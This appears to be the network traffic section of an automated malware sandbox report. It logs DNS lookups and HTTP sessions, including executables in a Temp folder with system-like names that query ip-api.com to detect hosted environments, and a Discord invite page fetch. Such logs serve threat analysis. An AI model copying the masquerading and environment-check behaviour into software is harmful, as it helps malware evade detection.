                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:10.162727118 CET192.168.2.51.1.1.10x18b6Standard query (0)discord.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:10.162900925 CET192.168.2.51.1.1.10x4e2eStandard query (0)discord.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:12.336405039 CET192.168.2.51.1.1.10x5f94Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:12.336623907 CET192.168.2.51.1.1.10x38cdStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:16.428141117 CET192.168.2.51.1.1.10xd435Standard query (0)discord.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:16.428319931 CET192.168.2.51.1.1.10x9418Standard query (0)discord.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:45.269443989 CET192.168.2.51.1.1.10xfd1aStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:45.269598961 CET192.168.2.51.1.1.10x7048Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:58.065725088 CET192.168.2.51.1.1.10xde0aStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:58.065864086 CET192.168.2.51.1.1.10x5b7aStandard query (0)cdn.discordapp.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:13:06.034125090 CET192.168.2.51.1.1.10x7f5eStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:13:06.034404039 CET192.168.2.51.1.1.10xf26bStandard query (0)cdn.discordapp.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:13:45.280258894 CET192.168.2.51.1.1.10x67caStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:13:45.280488968 CET192.168.2.51.1.1.10x9d7fStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:05.400707006 CET1.1.1.1192.168.2.50xc2b9No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:08.295006037 CET1.1.1.1192.168.2.50x8af6No error (0)discord.gg162.159.130.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:08.295006037 CET1.1.1.1192.168.2.50x8af6No error (0)discord.gg162.159.133.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:08.295006037 CET1.1.1.1192.168.2.50x8af6No error (0)discord.gg162.159.136.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:08.295006037 CET1.1.1.1192.168.2.50x8af6No error (0)discord.gg162.159.135.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:08.295006037 CET1.1.1.1192.168.2.50x8af6No error (0)discord.gg162.159.134.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:08.295090914 CET1.1.1.1192.168.2.50xc255No error (0)discord.gg65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:10.304737091 CET1.1.1.1192.168.2.50x4e2eNo error (0)discord.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:10.307168007 CET1.1.1.1192.168.2.50x18b6No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:10.307168007 CET1.1.1.1192.168.2.50x18b6No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:10.307168007 CET1.1.1.1192.168.2.50x18b6No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:10.307168007 CET1.1.1.1192.168.2.50x18b6No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:10.307168007 CET1.1.1.1192.168.2.50x18b6No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:12.516885996 CET1.1.1.1192.168.2.50x5f94No error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:12.518343925 CET1.1.1.1192.168.2.50x38cdNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:16.567897081 CET1.1.1.1192.168.2.50x9418No error (0)discord.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:16.568828106 CET1.1.1.1192.168.2.50xd435No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:16.568828106 CET1.1.1.1192.168.2.50xd435No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:16.568828106 CET1.1.1.1192.168.2.50xd435No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:16.568828106 CET1.1.1.1192.168.2.50xd435No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:16.568828106 CET1.1.1.1192.168.2.50xd435No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:45.443774939 CET1.1.1.1192.168.2.50xfd1aNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:58.218853951 CET1.1.1.1192.168.2.50x5b7aNo error (0)cdn.discordapp.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:58.219048023 CET1.1.1.1192.168.2.50xde0aNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:58.219048023 CET1.1.1.1192.168.2.50xde0aNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:58.219048023 CET1.1.1.1192.168.2.50xde0aNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:58.219048023 CET1.1.1.1192.168.2.50xde0aNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:58.219048023 CET1.1.1.1192.168.2.50xde0aNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:13:06.179052114 CET1.1.1.1192.168.2.50x7f5eNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:13:06.179052114 CET1.1.1.1192.168.2.50x7f5eNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:13:06.179052114 CET1.1.1.1192.168.2.50x7f5eNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:13:06.179052114 CET1.1.1.1192.168.2.50x7f5eNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:13:06.179052114 CET1.1.1.1192.168.2.50x7f5eNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:13:06.180058956 CET1.1.1.1192.168.2.50xf26bNo error (0)cdn.discordapp.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:13:45.559062004 CET1.1.1.1192.168.2.50x67caNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    0192.168.2.549707208.95.112.1801892C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:05.584490061 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: ip-api.com
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:06.764697075 CET175INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:05 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                    Content-Length: 6
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                    X-Ttl: 59
                                                                                                                                                                                                                                                                                    X-Rl: 43
                                                                                                                                                                                                                                                                                    Data Raw: 66 61 6c 73 65 0a
                                                                                                                                                                                                                                                                                    Data Ascii: false


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    1192.168.2.549706208.95.112.180528C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:05.584796906 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: ip-api.com
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:06.763945103 CET175INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:05 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                    Content-Length: 6
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                    X-Ttl: 60
                                                                                                                                                                                                                                                                                    X-Rl: 44
                                                                                                                                                                                                                                                                                    Data Raw: 66 61 6c 73 65 0a
                                                                                                                                                                                                                                                                                    Data Ascii: false


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    0192.168.2.549709162.159.130.2344437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:09 UTC663OUTGET /BNXa5rYFXM HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.gg
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:10 UTC845INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:09 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Location: https://discord.com/invite/BNXa5rYFXM
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TP4iF%2BhB40vdFNmMus2v6Fr1sgOhGk%2B52w7mwHO3c7pdsUR6oXb86aXdeG%2FnJ8PU2Yrtymu%2FQoYMmuFcYuio8ymncb2tUWQc068E%2FmDM45iipHbLUbtgdoAx9js%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    CF-RAY: 8e73d0025cda7c93-EWR


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    1192.168.2.5497132.23.161.164443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:10 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                    Host: fs.microsoft.com
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:11 UTC479INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                    Server: Kestrel
                                                                                                                                                                                                                                                                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                    X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                                    X-Ms-Region: prod-eus-z1
                                                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                    X-OSID: 2
                                                                                                                                                                                                                                                                                    X-CID: 2
                                                                                                                                                                                                                                                                                    X-CCC: GB
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=220875
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:11 GMT
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    X-CID: 2


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    2192.168.2.549714162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:11 UTC671OUTGET /invite/BNXa5rYFXM HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:12 UTC497INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:12 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d00e4bfe422e-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                                                                                    Last-Modified: Sat, 23 Nov 2024 00:20:15 GMT
                                                                                                                                                                                                                                                                                    Set-Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; Expires=Thu, 22 Nov 2029 20:12:12 GMT; Max-Age=157680000; Path=/; Secure; HttpOnly; SameSite=Lax
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:12 UTC5208INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 3b 20 73 63 72 69 70 74 2d 73 72 63 20 27 73 65 6c 66 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 6e 6f 6e 63 65 2d 4d 54 41 34 4c 44 49 79 4d 69 77 32 4e 69 77 78 4f 44 49 73 4d 54 49 32 4c 44 63 30 4c 44 59 31 4c 44 45 34 4e 51 3d 3d 27 20 62 6c 6f 62 3a 20 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 6e 69 6d 61 74 69 6f 6e 73 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f
                                                                                                                                                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline' 'nonce-MTA4LDIyMiw2NiwxODIsMTI2LDc0LDY1LDE4NQ==' blob: https://cdn.discordapp.com/animations/ https://www.gstatic.com/recaptcha/ https://www.google.com/recaptcha/
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:12 UTC1369INData Raw: 32 61 36 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 33 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 43 68 65 63 6b 20 6f 75 74 20 74 68 65 20 4e 4f 20 4e 41 4d 45 20 63 6f 6d 6d 75 6e 69 74 79 20 6f 6e 20 44 69 73 63 6f 72 64 20 2d 20 68 61 6e 67 20 6f 75 74 20 77 69 74 68 20 31 38 30 38 20 6f 74 68 65 72 20 6d
                                                                                                                                                                                                                                                                                    Data Ascii: 2a69<!DOCTYPE html><html><head> <meta charset="utf-8"> <meta content="width=device-width,initial-scale=1,maximum-scale=3" name="viewport"><meta name="description" content="Check out the NO NAME community on Discord - hang out with 1808 other m
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:12 UTC1369INData Raw: 6e 74 65 6e 74 3d 22 69 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 3a 61 6c 74 65 72 6e 61 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 3a 61 6c 74 65 72 6e 61 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 63 73 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 3a 61 6c 74 65 72 6e 61 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 72 6f 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 3a 61 6c 74 65 72 6e 61 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 75 6b 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 3a 61 6c 74
                                                                                                                                                                                                                                                                                    Data Ascii: ntent="it" /><meta property="og:locale:alternate" content="he" /><meta property="og:locale:alternate" content="cs" /><meta property="og:locale:alternate" content="ro" /><meta property="og:locale:alternate" content="uk" /><meta property="og:locale:alt
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:12 UTC1369INData Raw: 3d 22 6f 67 3a 6c 6f 63 61 6c 65 3a 61 6c 74 65 72 6e 61 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 3a 61 6c 74 65 72 6e 61 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 2d 47 42 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 3a 61 6c 74 65 72 6e 61 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 75 22 20 2f 3e 0a 3c 6d 65 74 61 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 6a 61 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 2f 69 6e 76 69 74 65 2f 42 4e 58 61 35 72 59 46 58 4d 3f 6c 6f 63 61 6c 65 3d 6a 61 22 20 2f 3e 0a 3c 6d 65 74 61 20 72 65 6c 3d 22 61 6c
                                                                                                                                                                                                                                                                                    Data Ascii: ="og:locale:alternate" content="no" /><meta property="og:locale:alternate" content="en-GB" /><meta property="og:locale:alternate" content="hu" /><meta rel="alternate" hreflang="ja" href="https://discord.com/invite/BNXa5rYFXM?locale=ja" /><meta rel="al
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:12 UTC1369INData Raw: 59 46 58 4d 3f 6c 6f 63 61 6c 65 3d 72 75 22 20 2f 3e 0a 3c 6d 65 74 61 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 7a 68 2d 54 57 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 2f 69 6e 76 69 74 65 2f 42 4e 58 61 35 72 59 46 58 4d 3f 6c 6f 63 61 6c 65 3d 7a 68 2d 54 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 70 74 2d 42 52 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 2f 69 6e 76 69 74 65 2f 42 4e 58 61 35 72 59 46 58 4d 3f 6c 6f 63 61 6c 65 3d 70 74 2d 42 52 22 20 2f 3e 0a 3c 6d 65 74 61 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 65 73 2d 34
                                                                                                                                                                                                                                                                                    Data Ascii: YFXM?locale=ru" /><meta rel="alternate" hreflang="zh-TW" href="https://discord.com/invite/BNXa5rYFXM?locale=zh-TW" /><meta rel="alternate" hreflang="pt-BR" href="https://discord.com/invite/BNXa5rYFXM?locale=pt-BR" /><meta rel="alternate" hreflang="es-4
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:12 UTC1369INData Raw: 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 2f 69 6e 76 69 74 65 2f 42 4e 58 61 35 72 59 46 58 4d 3f 6c 6f 63 61 6c 65 3d 65 73 2d 45 53 22 20 2f 3e 0a 3c 6d 65 74 61 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 66 69 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 2f 69 6e 76 69 74 65 2f 42 4e 58 61 35 72 59 46 58 4d 3f 6c 6f 63 61 6c 65 3d 66 69 22 20 2f 3e 0a 3c 6d 65 74 61 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 62 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 2f 69 6e 76 69 74 65 2f 42 4e 58 61 35 72
                                                                                                                                                                                                                                                                                    Data Ascii: ernate" hreflang="es-ES" href="https://discord.com/invite/BNXa5rYFXM?locale=es-ES" /><meta rel="alternate" hreflang="fi" href="https://discord.com/invite/BNXa5rYFXM?locale=fi" /><meta rel="alternate" hreflang="bg" href="https://discord.com/invite/BNXa5r
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:12 UTC1369INData Raw: 63 30 4c 44 59 31 4c 44 45 34 4e 51 3d 3d 22 3e 77 69 6e 64 6f 77 2e 5f 5f 4f 56 45 52 4c 41 59 5f 5f 3d 2f 6f 76 65 72 6c 61 79 2f 2e 74 65 73 74 28 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 4d 54 41 34 4c 44 49 79 4d 69 77 32 4e 69 77 78 4f 44 49 73 4d 54 49 32 4c 44 63 30 4c 44 59 31 4c 44 45 34 4e 51 3d 3d 22 3e 77 69 6e 64 6f 77 2e 5f 5f 42 49 4c 4c 49 4e 47 5f 53 54 41 4e 44 41 4c 4f 4e 45 5f 5f 3d 2f 5e 5c 2f 62 69 6c 6c 69 6e 67 2f 2e 74 65 73 74 28 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 4d 54 41 34 4c 44 49 79 4d 69 77 32 4e 69 77 78 4f 44 49 73 4d 54 49 32 4c 44 63 30 4c 44 59
